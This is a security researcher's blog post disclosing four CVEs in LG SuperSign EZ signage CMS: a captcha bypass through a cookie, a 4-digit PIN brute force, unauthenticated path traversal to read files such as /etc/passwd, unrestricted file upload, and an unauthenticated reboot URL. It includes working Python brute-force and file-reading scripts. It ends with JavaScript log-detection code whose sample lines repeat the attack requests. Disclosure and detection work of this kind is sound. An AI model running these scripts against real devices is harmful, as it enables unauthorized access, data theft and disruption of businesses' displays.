Thursday, September 13, 2018

Multiple vulnerabilities in LG SuperSignEZ CMS


Hello there, it's been a long time.

Lately, I've been playing with LG SuperSign TVs and found some vulnerabilities.

These vulnerabilities have been assigned the following CVEs:

Weak authentication (captcha bypass + 4-digit PIN): CVE-2018-16286
Arbitrary file upload: CVE-2018-16287
LFI (local file inclusion): CVE-2018-16288
DoS via reboot command: CVE-2018-16706


As we can see in the link above, LG SuperSign TVs are:

"* An industry definitive, software-based content management solution
 * All-in-one solution for editing, scheduling, and distribution
 * Suitable for large-scale displays operation. Seamless management of different content for different displays"

These TVs are used in companies and stores for advertising.

The displayed content is managed from a CMS built into these TVs, called SuperSign EZ. It offers a web interface on port 9080 (a Node.js application using the Express framework):




First vuln, weak authentication

In the screenshot above, we have a login form with two fields, PIN and captcha. Hmmm... We don't know the minimum and maximum length of the PIN, and we can't brute-force it because of the captcha. But... once I had access to the administration page (in this case the CMS had the default PIN 0000), I found two interesting things.

1_ There is a cookie named captcha with the value pass



2_ The PIN has a maximum of 4 digits (I verified that in the "Change PIN number" section)



So I logged out, used a cookie editor to add a cookie named "captcha" with the value "pass", and guess what...



The captcha was gone!

So... we have a 4-digit PIN and no captcha to solve... It's time to script our way in!

Analyzing the response after a successful login, we receive the message:


If we enter a wrong password we get:



So, we can code something like this:

import requests
from argparse import ArgumentParser


parser = ArgumentParser(description="SuperSign BruteForce Script")
parser.add_argument("-t", "--target", dest="target",
                    help="Target host:port")
parser.add_argument("-p", "--pass", dest="password",
                    help="Path to a PIN wordlist (one PIN per line)")

args = parser.parse_args()


print("====================================")
print("=    SuperSign BruteForce Script   =")
print("====================================")


# Opening the PIN file (or you could just loop from 0000 to 9999)
with open(args.password, 'r') as f:
    for line in f:
        pin = line.strip()

        data = {
            'id': 'admin',
            'password': pin,
            'captcha': 'pass',
            'captcha_compare': 'pas'
        }

        print('[+]Trying with PIN:', pin)

        # The captcha:pass cookie is what removes the captcha check (see above)
        s = requests.post('http://' + args.target.strip() + '/',
                          data=data, cookies={'captcha': 'pass'})

        if 'success' in s.text:
            print('Success!')
            break
        print('Access Denied')
        print()


The code is very simple. For every PIN in the wordlist (or the whole 0000-9999 range), we send a login request with the captcha:pass cookie and check the response for the success message.

Bingo, we are in.

Second vuln, Local File Inclusion

Once I was in, using Burp again, I analyzed the requests the application makes when a user adds a new template, and found that files are fetched from this URL:

http://LG_SuperSign_IP:9080/signEzUI/playlist/edit/upload/LGXXXXXX/uploaded_file.ext

uploaded_file.ext is the file included in the template.

So I started trying for LFI on some paths, and after receiving the message "Not found" over and over, I got this beautiful response at this path:

http://LG_SuperSign_IP:9080/signEzUI/playlist/edit/upload/../../../../../../../../../../etc/passwd



This is critical because these TVs can be connected to any other device on the company or store network:


An attacker can obtain sensitive information for further attacks.

If you are thinking that an attacker needs the first vulnerability to gain access and only then can use the second one to read those files, you are wrong. There is no need to be authenticated to exploit this LFI. If you take a look at the picture again, you can see that there is no cookie, so I'm not logged in.

Here is the Python code to retrieve any file you want:

import requests
from argparse import ArgumentParser


parser = ArgumentParser(description="SuperSign LFI")
parser.add_argument("-t", "--target", dest="target",
                    help="Target host:port")
parser.add_argument("-p", "--path", dest="filepath",
                    help="path to the file you want to read (e.g. /etc/passwd)")

args = parser.parse_args()
path = args.filepath

# Nine URL-encoded "../" steps plus a final ".." walk out of the upload directory;
# the requested path is appended as-is, so it must start with "/"
s = requests.get('http://' + args.target.strip()
                 + '/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
                 + path)
print(s.text)


Third vuln, Arbitrary file upload

Obviously, if you can serve content, you have a file upload function. The problem is that there is no control over the file type a user can upload, so any kind of file can be uploaded.


Then we can access the uploaded file through the LFI vulnerability (in this case, to get an XSS):


With this in mind, an attacker can access the manager, upload a malicious file and send the link to the victim.


Hey wait, there's one more...

Fourth vuln, DoS via reboot function

While triggering an error, I found some interesting files that I could read via the LFI. One of those files contained the code of a reboot function:



So... making a request to the URL http://SuperSign_IP:9080/qsr_server/device/reboot reboots the device without authentication.


Well, I guess that's all for the moment.


Recommendations

At the moment, the only thing you can do to mitigate these vulnerabilities is to isolate these devices. You must restrict access to these TVs within your internal network and please, please, please, DO NOT EXPOSE THEM TO THE INTERNET!!!!
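Besides isolating the devices, the four behaviours described in this post (login brute force after the captcha bypass, the ..%2f traversal under the upload path, and hits on the reboot endpoint) all leave distinctive traces in a reverse proxy or web-server access log placed in front of the TV. As an added example (my own code, not LG's or SuperSign's), here is detection logic for those patterns run over constructed sample log lines in combined format; the IPs, timestamps and the sixty-second/five-attempt brute-force threshold are assumed values, not real traffic or a vendor recommendation.

```javascript
// Added example, not SuperSign's code: flag the request patterns from this post in
// web-server access logs. The lines below are constructed samples, not real traffic.
const SAMPLE_LOG = [
  '10.0.0.5 - - [13/Sep/2018:10:00:00 +0000] "POST / HTTP/1.1" 200 512',
  '10.0.0.5 - - [13/Sep/2018:10:00:00 +0000] "POST / HTTP/1.1" 200 512',
  '10.0.0.5 - - [13/Sep/2018:10:00:01 +0000] "POST / HTTP/1.1" 200 512',
  '10.0.0.5 - - [13/Sep/2018:10:00:01 +0000] "POST / HTTP/1.1" 200 512',
  '10.0.0.5 - - [13/Sep/2018:10:00:02 +0000] "POST / HTTP/1.1" 200 512',
  '10.0.0.5 - - [13/Sep/2018:10:00:02 +0000] "POST / HTTP/1.1" 200 512',
  '10.0.0.7 - - [13/Sep/2018:10:03:10 +0000] "GET /signEzUI/playlist/edit/upload/LG000001/ad.png HTTP/1.1" 200 9000',
  '10.0.0.9 - - [13/Sep/2018:10:05:00 +0000] "GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1" 200 1432',
  '10.0.0.9 - - [13/Sep/2018:10:06:00 +0000] "GET /qsr_server/device/reboot HTTP/1.1" 200 0',
];

const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5, Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };
const LINE_RE = /^(\S+) \S+ \S+ \[(\d{2})\/(\w{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})\] "([A-Z]+) (\S+) [^"]*" (\d{3})/;

// Parse one combined-format line into its fields; the timestamp becomes epoch seconds (UTC)
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, dd, mon, yyyy, hh, mi, ss, sign, oh, om, method, rawPath, status] = m;
  const local = Date.UTC(+yyyy, MONTHS[mon], +dd, +hh, +mi, +ss) / 1000;
  const offset = (sign === '-' ? -1 : 1) * (+oh * 3600 + +om * 60);
  return { ip, ts: local - offset, method, rawPath, status: +status };
}

// Decode the path the way a lax server would, so "..%2f" and "../" look the same
function decodedPath(rawPath) {
  try { return decodeURIComponent(rawPath); } catch (e) { return rawPath; }
}

// Run the three detections over an array of log lines; returns alert objects in log order
function detect(lines, { window = 60, threshold = 5 } = {}) {
  const alerts = [];
  const postsByIp = new Map();   // ip -> recent timestamps of POST / (login attempts)
  const flaggedBrute = new Set();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r) continue;
    const p = decodedPath(r.rawPath);

    // Rule 1: directory traversal anywhere in the path (the LFI)
    if (p.includes('../') || p.includes('..\\')) {
      alerts.push({ rule: 'path_traversal', ip: r.ip, detail: r.rawPath });
    }
    // Rule 2: any hit on the unauthenticated reboot endpoint (the DoS)
    if (p.startsWith('/qsr_server/device/reboot')) {
      alerts.push({ rule: 'unauthenticated_reboot', ip: r.ip, detail: r.rawPath });
    }
    // Rule 3: a burst of login POSTs from one source (PIN guessing once the captcha is bypassed)
    if (r.method === 'POST' && p === '/') {
      const recent = (postsByIp.get(r.ip) || []).filter(t => r.ts - t <= window);
      recent.push(r.ts);
      postsByIp.set(r.ip, recent);
      if (recent.length >= threshold && !flaggedBrute.has(r.ip)) {
        flaggedBrute.add(r.ip);
        alerts.push({ rule: 'pin_bruteforce', ip: r.ip, detail: `${recent.length} login POSTs within ${window}s` });
      }
    }
  }
  return alerts;
}

// Convenience wrapper over the constructed sample
function detectSample() { return detect(SAMPLE_LOG); }
```

Running detectSample() yields one alert per pattern: a brute-force alert for 10.0.0.5 on its fifth login POST, a traversal alert for the ..%2f request, and a reboot alert for the /qsr_server/device/reboot hit; the ordinary template fetch from 10.0.0.7 is left alone. Because the brute-force rule only makes sense when the device is behind something that logs the requests, it is a further argument for the isolation the recommendation above asks for.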

